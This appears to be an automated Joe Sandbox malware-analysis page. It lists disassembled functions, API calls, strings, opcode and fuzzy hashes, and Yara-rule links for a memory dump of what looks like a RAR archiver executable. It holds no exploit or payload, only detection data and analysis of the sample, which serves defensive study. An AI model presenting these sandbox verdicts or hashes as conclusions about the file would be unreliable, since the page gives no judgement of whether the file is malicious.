Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: 8bd5674956716152b0d98d0b7f564a8bb9205b08a8c78fdc11574f0819ba89cb
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: 02D06765E1E91BC5F788FB81A845738E6617F547B9FC50774C41D095928FED34548320

Function 00007FF74EE94538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE94549

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 8d4d04eb3771aa19023872058ee2de40c7508bda87ac48edcf54ace04aa6d5f0
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: 66C02B21E09881C0E604736D88850342110BF85735FD00330C13D056E0CF9800EB0310

Function 00007FF74EE91930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF74EE91958

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: 9ebaa2f8b1c14e7064085798909d1d2196f7640e6c8e96efc365190be2573208
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: 0EF0A42290C642C5FB65BB64E4403B4B6A0EB01BB8FD95370D67D050D8CEA8D996C760

Non-executed Functions

Function 00007FF74EEBAE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAEE9
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF01
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF19
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF75
GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAFB0
SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB23B
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB244
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB287

Strings

MAPIFreeBuffer, xrefs: 00007FF74EEBAF0F
MAPIResolveName, xrefs: 00007FF74EEBAEF7
MAPI32.DLL, xrefs: 00007FF74EEBAEC2
SMTP:, xrefs: 00007FF74EEBB069
MAPISendMail, xrefs: 00007FF74EEBAEDF

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
API String ID: 3483800833-4165214152
Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
Instruction ID: a131e118d7fd8bbd6604c9ebb8a068c00e894d1a3a12b41836fc693400d9e68c
Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
Instruction Fuzzy Hash: 77C17022A0DA52C9FB20FF65E8502B9B7A0FB447A4F840135DA8D47B95DFBCD645C710

Function 00007FF74EEAAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF74EEAAFA0

Part of subcall function 00007FF74EEBB6D0: Sleep.KERNEL32(?,?,?,?,00007FF74EE8CBED,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EEBB730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EEAB185
new.LIBCMT ref: 00007FF74EEAB18F

Strings

, xrefs: 00007FF74EEAB2B6
%ls%0*u.rev, xrefs: 00007FF74EEAB170

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Sleepswprintf
String ID: $%ls%0*u.rev
API String ID: 407366315-3491873314
Opcode ID: fbf9e5f12b149fcf5a5e6fa2f3a063ac4de3e9cb50c152702693afccae20d4e1
Instruction ID: 4a676c5e3756e14b48bce1530bfdf15220f90acc6f60aeff990dd7b7d44a38da
Opcode Fuzzy Hash: fbf9e5f12b149fcf5a5e6fa2f3a063ac4de3e9cb50c152702693afccae20d4e1
Instruction Fuzzy Hash: 6E02D432A0C6A2C6FB20FB25E4445ADB3A5FB887A4F810139DE9D47799DEBCE445C710

Function 00007FF74EE749B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF74EE74BD8

Part of subcall function 00007FF74EEBB6D0: Sleep.KERNEL32(?,?,?,?,00007FF74EE8CBED,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EEBB730

Part of subcall function 00007FF74EE91E80: CreateFileW.KERNELBASE ref: 00007FF74EE91F4A
Part of subcall function 00007FF74EE91E80: GetLastError.KERNEL32 ref: 00007FF74EE91F59
Part of subcall function 00007FF74EE91E80: CreateFileW.KERNELBASE ref: 00007FF74EE91F99
Part of subcall function 00007FF74EE91E80: GetLastError.KERNEL32 ref: 00007FF74EE91FA2
Part of subcall function 00007FF74EE91E80: SetFileTime.KERNEL32 ref: 00007FF74EE91FF1

Strings

, xrefs: 00007FF74EE74F01
%12s %s, xrefs: 00007FF74EE74E8E
%s, xrefs: 00007FF74EE74EAF
%12s %s, xrefs: 00007FF74EE74E58

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$SleepTime
String ID: %12s %s$%12s %s$ $%s
API String ID: 2965465231-221484280
Opcode ID: a2a324eddf7a9e52bc22fac218f24dc088c81194899047d0e28de429ba85f286
Instruction ID: c3cefbddbb37d5ebce97bf9f6915f0ded2e246cc25d84c0a24d85c8e039cb5ca
Opcode Fuzzy Hash: a2a324eddf7a9e52bc22fac218f24dc088c81194899047d0e28de429ba85f286
Instruction Fuzzy Hash: CDF18962A0DAA6C5FB60FB12E0402BEA7A1FB45BA4FC40435DA8D07785DFBCD955C710

Function 00007FF74EED4C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF74EED4C89
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF74EED4CA1
RtlVirtualUnwind.KERNEL32 ref: 00007FF74EED4CDC
IsDebuggerPresent.KERNEL32 ref: 00007FF74EED4D15
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF74EED4D1F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF74EED4D2A

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction ID: a66e49b1aebbfc101dfb041236023cad3717a55dd8a1be20372197f2a3fce2bf
Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
Instruction Fuzzy Hash: B1317336608F91C6EB60EF25E8406AEB3A4FB84764F940135EA9D43B58DF7CD545CB10

Function 00007FF74EE8EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF74EE8EE47), ref: 00007FF74EE8EF73
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF74EE8EE47), ref: 00007FF74EE8EF84
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF74EE8EFA7
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF74EE8EFCA
GetLastError.KERNEL32 ref: 00007FF74EE8EFD4
CloseHandle.KERNEL32 ref: 00007FF74EE8EFE7

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction ID: 4aca470190f6bf04a7844025183ffbe120a619899cea49c9e30f623111803ced
Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
Instruction Fuzzy Hash: B211723261CB52C2F750EF65F84056AB3A1FB88BA0F844435EA8E47A28CF7CD504CB50

Function 00007FF74EE87988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(00000000,00000100,?,?,00000002,00007FF74EE87892), ref: 00007FF74EE879BC
GetStdHandle.KERNEL32 ref: 00007FF74EE879CA
GetConsoleMode.KERNEL32 ref: 00007FF74EE879E0
GetConsoleMode.KERNEL32 ref: 00007FF74EE879EE
SetConsoleMode.KERNEL32 ref: 00007FF74EE879FC
SetConsoleMode.KERNEL32 ref: 00007FF74EE87A0A
ReadConsoleW.KERNEL32 ref: 00007FF74EE87A24
SetConsoleMode.KERNEL32 ref: 00007FF74EE87A3A
SetConsoleMode.KERNEL32 ref: 00007FF74EE87A47

Part of subcall function 00007FF74EE882E4: fflush.LIBCMT ref: 00007FF74EE8832F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Console$Mode$Handle$Readfflush
String ID:
API String ID: 1039280553-0
Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction ID: 9009b9cf68889111154d40c011d3e7593a9543d5a9736065e6b9c07a029ffb7e
Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
Instruction Fuzzy Hash: 5E215E25B1C662D7FA00BB69A804539B761FF89BB1F940230EE4A07B64DE7CE446CB10

Function 00007FF74EEBBC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74EE96754: GetVersionExW.KERNEL32 ref: 00007FF74EE96785

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF74EEBBCEF
FileTimeToSystemTime.KERNEL32 ref: 00007FF74EEBBCFB
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF74EEBBD0B
SystemTimeToFileTime.KERNEL32 ref: 00007FF74EEBBD19
SystemTimeToFileTime.KERNEL32 ref: 00007FF74EEBBD27
FileTimeToSystemTime.KERNEL32 ref: 00007FF74EEBBD68

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction ID: 872e78d861ad1f85a4bc29784d5ba6ab3d216c71f291132a52b1f559a45ebe40
Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction Fuzzy Hash: 315179B2B18661CEEB54EFB8E4401AC77B1F708798B90402ADE4E57B58EF78D545CB10

Function 00007FF74EEAEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74EE772C4: new.LIBCMT ref: 00007FF74EE773DE

new.LIBCMT ref: 00007FF74EEAEBB4

Strings

rar, xrefs: 00007FF74EEAECF2
rebuilt., xrefs: 00007FF74EEAECA3
sfx, xrefs: 00007FF74EEAECC9
exe, xrefs: 00007FF74EEAECDC

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID: exe$rar$rebuilt.$sfx
API String ID: 0-13699710
Opcode ID: 2225ed33e2d2381bcbca4562f0b7de7947310cd957fba0cf049a1af6971fb554
Instruction ID: bc8f5f6b33ebdb487a1e96b24039014c533dc55e4d4a71057bc545398f10702e
Opcode Fuzzy Hash: 2225ed33e2d2381bcbca4562f0b7de7947310cd957fba0cf049a1af6971fb554
Instruction Fuzzy Hash: 47816021A0C6E2C5FE20FB64D4152F9A392BF853A4FC04535D98D0B6DADEADE645C360

Function 00007FF74EECE0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

abort.LIBCMT ref: 00007FF74EECE0F4
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF74EECE1BC
RtlUnwindEx.KERNEL32 ref: 00007FF74EECE20B

Strings

csm, xrefs: 00007FF74EECE1A2
f, xrefs: 00007FF74EECE13A

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabort
String ID: csm$f
API String ID: 3913153233-629598281
Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction ID: beab7a0dc9b24e4a22cd93e9755568412bcfb5267170a8dbeae8ef9d8184c535
Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction Fuzzy Hash: 5D619132A0D662C6FB18FB15E444A79B795FB44BA4F948530EE0E47754DFB8E881C720

Function 00007FF74EEBBE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74EEBBC8C: FileTimeToLocalFileTime.KERNEL32 ref: 00007FF74EEBBCEF
Part of subcall function 00007FF74EEBBC8C: FileTimeToSystemTime.KERNEL32 ref: 00007FF74EEBBD68

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF74EEBBEAE
